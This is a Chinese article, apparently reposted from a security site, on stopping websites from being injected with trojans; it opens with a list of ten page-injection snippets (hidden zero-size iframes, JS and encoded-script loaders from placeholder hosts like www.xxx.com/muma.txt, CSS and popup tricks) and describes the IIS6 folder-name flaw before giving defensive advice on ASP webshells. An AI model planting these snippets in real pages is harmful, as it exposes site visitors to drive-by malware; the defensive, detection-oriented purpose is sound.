如何防止網站被掛馬?

掛馬代碼大全
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存爲xxx.js,
則JS掛馬代碼爲
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意後綴
四:body掛馬
<body ></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '/r/n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:圖片僞裝
<html>
<iframe src="網馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:僞裝調用:
<frameset rows="444,0" cols="*">
<frame src="打開網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)" > 頁面要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

 

如何防止網站被掛馬
A。爲什麼好好的網站會有木馬?
一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有上傳功能,沒有進行文件目錄和文件後綴等的判斷,一般這類的目錄,以“海陽頂端網ASP木馬”較爲流行。
因2003平臺IIS6原因,也存在目錄名問題引起ASP木馬。( 微軟的IIS 6存在嚴重解析文件名錯誤
測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內容可以直接是,然後,用IE遠程訪問這個hack.jpg,你可以發現,它一樣被當作是ASP文件來運行!顯然,只要你的網站程序,允許用戶自己建立文件夾及上傳圖片,黑客就可以上傳圖片來當作ASP木馬來運行。
解決辦法:所有使用星外虛擬主機管理平臺的虛擬主機用戶,可以在主機面板,設置執行權限選項中,直接將有上傳權限的目錄,取消ASP的運行權限,就可以解決這個問題。
可以參考其他公司的同類公告:
http://www.powereasy.net/Announce/3004.html(動易)
)
大家常用的動易2006和動網,BLOG這類的程序,需要詳細的檢查一下,並跟着開發者進行相應的安全程序升級。這樣才能減少因代碼原因引起的網站被黑。
B。網站被黑了,如何檢查是那些網頁有問題呢。
目前流行的網站被黑,是在相應的asp,htm,js等文件中,插入<iframe src=http://
這樣的,需要使用查找程序來查找這類文件出來,手工刪除此類插入的HTML代碼。這項工作相對比較繁鎖。需要仔細的查找。也會有一些木馬是插入到js中,是以js調用方式的。更詳細的資料,請看後部分E.掛馬代碼大全。
C。禁止寫入和目錄禁止執行的功能,二項功能組合,可以有效的防止ASP木馬。這對於常被ASP木馬影響的網站來說,會有一些幫助。
D。
防範ASP木馬的十大基本原則 [來源:jit8 BLOG]
本文章地址:http://tech.163.com/05/1107/11/21V0IUDU000917GF.html
  由於ASP它本身是服務器提供的一貢服務功能,特別是最近由dvbbs的upfile文件出現漏洞以來,其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防範和清除,爲網管人員提出了更高的技術要求.
  幾個大的程序全部被發現存在上傳漏洞,小程序更是不計其數,讓asp木馬一下佔據了主流,得到廣泛的使用,想必如果你是做服務器的話,一定爲此頭疼不止吧,特別是虛擬主機的用戶都遇到過網頁被篡改、數據被刪除的經歷,事後除了對這種行徑深惡痛絕外,許多客戶又苦於沒有行之有效的防範措施。鑑於大部分網站入侵都是利用asp木馬完成的,特寫此文章以使普通虛擬主機用戶能更好地瞭解、防範asp木馬。也只有空間商和虛擬主機用戶共同做好防範措施纔可以有效防範asp木馬!
  我們首先來說一下怎麼樣防範好了,說到防範我們自然要對asp木馬的原理了,大道理我也不講了,網上的文章有的是,簡單的說asp木馬其實就是用asp編寫的網站程序,甚至有些asp木馬就是由asp網站管理程序修改而來的。就比如說我們常見的asp站長助手,等等
  它和其他asp程序沒有本質區別,只要是能運行asp的空間就能運行它,這種性質使得asp木馬非常不易被發覺。它和其他asp程序的區別只在於asp木馬是入侵者上傳到目標空間,並幫助入侵者控制目標空間的asp程序。嚴重的從而獲取服務器管理員的權限,要想禁止asp木馬運行就等於禁止asp的運行,顯然這是行不通的,這也是爲什麼asp木馬猖獗的原因!有人要問了,是不是就沒有辦法了呢,不,有辦法的:
  第一:從源頭入手,入侵者是怎麼樣上傳asp木馬的呢?一般喲幾種方法,通過sql注射手段,獲取管理員權限,通過備份數據庫的功能將asp木馬寫入服務器。或者進入後臺通過asp程序的上傳功能的漏洞,上傳木馬等等,當然正常情況下,這些可以上傳文件的asp程序都是有權限限制的,大多也限制了asp文件的上傳。(比如:可以上傳圖片的新聞發佈、圖片管理程序,及可以上傳更多類型文件的論壇程序等),如果我們直接上傳asp木馬的話,我們會發現,程序會有提示,是不能直接上傳的,但由於存在人爲的asp設置錯誤及asp程序本身的漏洞,給了入侵者可乘之機,實現上傳asp木馬。
  因此,防範asp木馬的重點就在於虛擬主機用戶如何確保自己空間中asp上傳程序的安全上,如果你是用別人的程序的話,儘量用出名一點的大型一點的程序,這樣漏洞自然就少一些,而且儘量使用最新的版本,並且要經常去官方網站查看新版本或者是最新補丁,還有就是那些數據庫默認路徑呀,管理員密碼默認呀,一定要改,形成習慣保證程序的安全性。
  那麼如果你是程序員的話,我還想說的一點就是我們在網站程序上也應該儘量從安全的角度上編寫涉及用戶名與口令的程序最好封裝在服務器端,儘量少的在ASP文件裏出現,涉及到與數據庫連接地用戶名與口令應給予最小的權限; 需要經過驗證的ASP頁面,可跟蹤上一個頁面的文件名,只有從上一頁面轉進來的會話才能讀取這個頁面。防止ASP主頁.inc文件泄露問題; 防止UE等編輯器生成some.asp.bak文件泄露問題等等特別是上傳功能一定要特別注意
  上面的只是對客戶的一些要求,但是空間商由於無法預見虛擬主機用戶會在自己站點中上傳什麼樣的程序,以及每個程序是否存在漏洞,因此無法防止入侵者利用站點中客戶程序本身漏洞上傳asp木馬的行爲。空間商只能防止入侵者利用已被入侵的站點再次入侵同一服務器上其他站點的行爲。這也更加說明要防範asp木馬,虛擬主機用戶就要對自己的程序嚴格把關! 爲此我總結了ASP木馬防範的十大原則供大家參考:
  1、建議用戶通過ftp來上傳、維護網頁,儘量不安裝asp的上傳程序。
  2、對asp上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序。
  這其中包括各種新聞發佈、商城及論壇程序,只要可以上傳文件的asp都要進行身份認證!
  3、asp程序管理員的用戶名和密碼要有一定複雜性,不能過於簡單,還要注意定期更換。
  4、到正規網站下載asp程序,下載後要對其數據庫名稱和存放路徑進行修改,數據庫文件名稱也要有一定複雜性。
  5、要儘量保持程序是最新版本。
  6、不要在網頁上加註後臺管理程序登陸頁面的鏈接。
  7、爲防止程序有未知漏洞,可以在維護後刪除後臺管理程序的登陸頁面,下次維護時再通過ftp上傳即可。
  8、要時常備份數據庫等重要文件。
  9、日常要多維護,並注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!
  10、一旦發現被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。
  重新上傳文件前,所有asp程序用戶名和密碼都要重置,並要重新修改程序數據庫名稱和存放路徑以及後臺管理程序的路徑。
  做好以上防範措施,您的網站只能說是相對安全了,決不能因此疏忽大意,因爲入侵與反入侵是一場永恆的戰爭


本篇文章來源於 新世紀網安基地 (www.520hack.com) 原文出處:http://www.520hack.com/Article/Text5/server/200810/11649.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章